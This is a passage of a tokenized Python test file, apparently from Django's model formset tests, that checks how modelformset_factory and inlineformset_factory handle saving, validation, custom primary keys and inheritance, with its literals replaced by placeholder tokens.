assertQuerysetEqual ( formset . get_queryset ( ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> AuthorFormSet = modelformset_factory ( Author , max_num = <NUM_LIT:4> ) <EOL> formset = AuthorFormSet ( queryset = qs ) <EOL> self . assertQuerysetEqual ( formset . get_queryset ( ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_custom_save_method ( self ) : <EOL> class PoetForm ( forms . ModelForm ) : <EOL> def save ( self , commit = True ) : <EOL> author = super ( PoetForm , self ) . save ( commit = False ) <EOL> author . name = "<STR_LIT>" <EOL> if commit : <EOL> author . save ( ) <EOL> return author <EOL> PoetFormSet = modelformset_factory ( Poet , form = PoetForm ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> qs = Poet . objects . all ( ) <EOL> formset = PoetFormSet ( data = data , queryset = qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> poets = formset . save ( ) <EOL> self . assertEqual ( len ( poets ) , <NUM_LIT:2> ) <EOL> poet1 , poet2 = poets <EOL> self . assertEqual ( poet1 . name , '<STR_LIT>' ) <EOL> self . assertEqual ( poet2 . name , '<STR_LIT>' ) <EOL> def test_custom_form ( self ) : <EOL> """<STR_LIT>""" <EOL> class PostForm1 ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = Post <EOL> fields = ( '<STR_LIT:title>' , '<STR_LIT>' ) <EOL> class PostForm2 ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = Post <EOL> exclude = ( '<STR_LIT>' , ) <EOL> PostFormSet = modelformset_factory ( Post , form = PostForm1 ) <EOL> formset = PostFormSet ( ) <EOL> self . assertFalse ( "<STR_LIT>" in formset . forms [ <NUM_LIT:0> ] . fields ) <EOL> PostFormSet = modelformset_factory ( Post , form = PostForm2 ) <EOL> formset = PostFormSet ( ) <EOL> self . assertFalse ( "<STR_LIT>" in formset . forms [ <NUM_LIT:0> ] . fields ) <EOL> def test_model_inheritance ( self ) : <EOL> BetterAuthorFormSet = modelformset_factory ( BetterAuthor ) <EOL> formset = BetterAuthorFormSet ( ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = BetterAuthorFormSet ( data ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> author1 , = saved <EOL> self . assertEqual ( author1 , BetterAuthor . objects . get ( name = '<STR_LIT>' ) ) <EOL> hemingway_id = BetterAuthor . objects . get ( name = "<STR_LIT>" ) . pk <EOL> formset = BetterAuthorFormSet ( ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:2> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % hemingway_id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : hemingway_id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = BetterAuthorFormSet ( data ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . save ( ) , [ ] ) <EOL> def test_inline_formsets ( self ) : <EOL> AuthorBooksFormSet = inlineformset_factory ( Author , Book , can_delete = False , extra = <NUM_LIT:3> ) <EOL> author = Author . objects . create ( name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( instance = author ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> book1 , = saved <EOL> self . assertEqual ( book1 , Book . objects . get ( title = '<STR_LIT>' ) ) <EOL> self . assertQuerysetEqual ( author . book_set . all ( ) , [ '<STR_LIT>' ] ) <EOL> AuthorBooksFormSet = inlineformset_factory ( Author , Book , can_delete = False , extra = <NUM_LIT:2> ) <EOL> author = Author . objects . get ( name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( instance = author ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' % ( author . id , book1 . id ) ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' % author . id ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book1 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> book2 , = saved <EOL> self . assertEqual ( book2 , Book . objects . get ( title = '<STR_LIT>' ) ) <EOL> self . assertQuerysetEqual ( author . book_set . order_by ( '<STR_LIT:title>' ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def test_inline_formsets_save_as_new ( self ) : <EOL> AuthorBooksFormSet = inlineformset_factory ( Author , Book , can_delete = False , extra = <NUM_LIT:2> ) <EOL> author = Author . objects . create ( name = '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = Author ( ) , save_as_new = True ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> new_author = Author . objects . create ( name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( data , instance = new_author , save_as_new = True ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:2> ) <EOL> book1 , book2 = saved <EOL> self . assertEqual ( book1 . title , '<STR_LIT>' ) <EOL> self . assertEqual ( book2 . title , '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( prefix = "<STR_LIT:test>" ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:2> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> def test_inline_formsets_with_custom_pk ( self ) : <EOL> AuthorBooksFormSet2 = inlineformset_factory ( Author , BookWithCustomPK , can_delete = False , extra = <NUM_LIT:1> ) <EOL> author = Author . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet2 ( instance = author ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet2 ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> book1 , = saved <EOL> self . assertEqual ( book1 . pk , <NUM_LIT> ) <EOL> book1 = author . bookwithcustompk_set . get ( ) <EOL> self . assertEqual ( book1 . title , '<STR_LIT>' ) <EOL> def test_inline_formsets_with_multi_table_inheritance ( self ) : <EOL> AuthorBooksFormSet3 = inlineformset_factory ( Author , AlternateBook , can_delete = False , extra = <NUM_LIT:1> ) <EOL> author = Author . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet3 ( instance = author ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> formset = AuthorBooksFormSet3 ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> book1 , = saved <EOL> self . assertEqual ( book1 . title , '<STR_LIT>' ) <EOL> self . assertEqual ( book1 . notes , '<STR_LIT>' ) <EOL> @ skipUnlessDBFeature ( '<STR_LIT>' ) <EOL> def test_inline_formsets_with_nullable_unique_together ( self ) : <EOL> AuthorBooksFormSet4 = inlineformset_factory ( Author , BookWithOptionalAltEditor , can_delete = False , extra = <NUM_LIT:2> ) <EOL> author = Author . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet4 ( data , instance = author ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:2> ) <EOL> book1 , book2 = saved <EOL> self . assertEqual ( book1 . author_id , <NUM_LIT:1> ) <EOL> self . assertEqual ( book1 . title , '<STR_LIT>' ) <EOL> self . assertEqual ( book2 . author_id , <NUM_LIT:1> ) <EOL> self . assertEqual ( book2 . title , '<STR_LIT>' ) <EOL> def test_inline_formsets_with_custom_save_method ( self ) : <EOL> AuthorBooksFormSet = inlineformset_factory ( Author , Book , can_delete = False , extra = <NUM_LIT:2> ) <EOL> author = Author . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' ) <EOL> book1 = Book . objects . create ( pk = <NUM_LIT:1> , author = author , title = '<STR_LIT>' ) <EOL> book2 = Book . objects . create ( pk = <NUM_LIT:2> , author = author , title = '<STR_LIT>' ) <EOL> book3 = Book . objects . create ( pk = <NUM_LIT:3> , author = author , title = '<STR_LIT>' ) <EOL> class PoemForm ( forms . ModelForm ) : <EOL> def save ( self , commit = True ) : <EOL> poem = super ( PoemForm , self ) . save ( commit = False ) <EOL> poem . name = "<STR_LIT>" <EOL> if commit : <EOL> poem . save ( ) <EOL> return poem <EOL> PoemFormSet = inlineformset_factory ( Poet , Poem , form = PoemForm ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> poet = Poet . objects . create ( name = '<STR_LIT>' ) <EOL> formset = PoemFormSet ( data = data , instance = poet ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:2> ) <EOL> poem1 , poem2 = saved <EOL> self . assertEqual ( poem1 . name , '<STR_LIT>' ) <EOL> self . assertEqual ( poem2 . name , '<STR_LIT>' ) <EOL> custom_qs = Book . objects . order_by ( '<STR_LIT>' ) <EOL> formset = AuthorBooksFormSet ( instance = author , queryset = custom_qs ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:5> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:3> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:4> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:5>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book1 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book2 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book3 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = author , queryset = custom_qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> custom_qs = Book . objects . filter ( title__startswith = '<STR_LIT:F>' ) <EOL> formset = AuthorBooksFormSet ( instance = author , queryset = custom_qs ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( book3 . id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = AuthorBooksFormSet ( data , instance = author , queryset = custom_qs ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> def test_custom_pk ( self ) : <EOL> CustomPrimaryKeyFormSet = modelformset_factory ( CustomPrimaryKey ) <EOL> formset = CustomPrimaryKeyFormSet ( ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> place = Place . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' , city = '<STR_LIT>' ) <EOL> FormSet = inlineformset_factory ( Place , Owner , extra = <NUM_LIT:2> , can_delete = False ) <EOL> formset = FormSet ( instance = place ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:2> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = place ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> owner1 , = saved <EOL> self . assertEqual ( owner1 . name , '<STR_LIT>' ) <EOL> self . assertEqual ( owner1 . place . name , '<STR_LIT>' ) <EOL> formset = FormSet ( instance = place ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:3> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> % owner1 . auto_id ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:1> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:2> ] . as_p ( ) , <EOL> '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : six . text_type ( owner1 . auto_id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = place ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> owner2 , = saved <EOL> self . assertEqual ( owner2 . name , '<STR_LIT>' ) <EOL> self . assertEqual ( owner2 . place . name , '<STR_LIT>' ) <EOL> FormSet = modelformset_factory ( OwnerProfile ) <EOL> formset = FormSet ( ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( owner1 . auto_id , owner2 . auto_id ) ) <EOL> owner1 = Owner . objects . get ( name = '<STR_LIT>' ) <EOL> FormSet = inlineformset_factory ( Owner , OwnerProfile , max_num = <NUM_LIT:1> , can_delete = False ) <EOL> self . assertEqual ( FormSet . max_num , <NUM_LIT:1> ) <EOL> formset = FormSet ( instance = owner1 ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> % owner1 . auto_id ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = owner1 ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> profile1 , = saved <EOL> self . assertEqual ( profile1 . owner , owner1 ) <EOL> self . assertEqual ( profile1 . age , <NUM_LIT> ) <EOL> formset = FormSet ( instance = owner1 ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> % owner1 . auto_id ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : six . text_type ( owner1 . auto_id ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = owner1 ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> profile1 , = saved <EOL> self . assertEqual ( profile1 . owner , owner1 ) <EOL> self . assertEqual ( profile1 . age , <NUM_LIT> ) <EOL> def test_unique_true_enforces_max_num_one ( self ) : <EOL> place = Place . objects . create ( pk = <NUM_LIT:1> , name = '<STR_LIT>' , city = '<STR_LIT>' ) <EOL> FormSet = inlineformset_factory ( Place , Location , can_delete = False ) <EOL> self . assertEqual ( FormSet . max_num , <NUM_LIT:1> ) <EOL> formset = FormSet ( instance = place ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> self . assertHTMLEqual ( formset . forms [ <NUM_LIT:0> ] . as_p ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def test_foreign_keys_in_parents ( self ) : <EOL> self . assertEqual ( type ( _get_foreign_key ( Restaurant , Owner ) ) , models . ForeignKey ) <EOL> self . assertEqual ( type ( _get_foreign_key ( MexicanRestaurant , Owner ) ) , models . ForeignKey ) <EOL> def test_unique_validation ( self ) : <EOL> FormSet = modelformset_factory ( Product , extra = <NUM_LIT:1> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> product1 , = saved <EOL> self . assertEqual ( product1 . slug , '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> def test_unique_together_validation ( self ) : <EOL> FormSet = modelformset_factory ( Price , extra = <NUM_LIT:1> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> price1 , = saved <EOL> self . assertEqual ( price1 . price , Decimal ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( price1 . quantity , <NUM_LIT:1> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> } <EOL> formset = FormSet ( data ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> def test_unique_together_with_inlineformset_factory ( self ) : <EOL> repository = Repository . objects . create ( name = '<STR_LIT>' ) <EOL> FormSet = inlineformset_factory ( Repository , Revision , extra = <NUM_LIT:1> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : repository . pk , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = repository ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> saved = formset . save ( ) <EOL> self . assertEqual ( len ( saved ) , <NUM_LIT:1> ) <EOL> revision1 , = saved <EOL> self . assertEqual ( revision1 . repository , repository ) <EOL> self . assertEqual ( revision1 . revision , '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : repository . pk , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = repository ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> FormSet = inlineformset_factory ( Repository , Revision , fields = ( '<STR_LIT>' , ) , extra = <NUM_LIT:1> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : repository . pk , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = repository ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> def test_callable_defaults ( self ) : <EOL> person = Person . objects . create ( name = '<STR_LIT>' ) <EOL> FormSet = inlineformset_factory ( Person , Membership , can_delete = False , extra = <NUM_LIT:1> ) <EOL> formset = FormSet ( instance = person ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:1> ) <EOL> form = formset . forms [ <NUM_LIT:0> ] <EOL> now = form . fields [ '<STR_LIT>' ] . initial ( ) <EOL> result = form . as_p ( ) <EOL> result = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , result ) <EOL> self . assertHTMLEqual ( result , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % person . id ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : six . text_type ( now . strftime ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : six . text_type ( now . strftime ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FormSet ( data , instance = person ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> 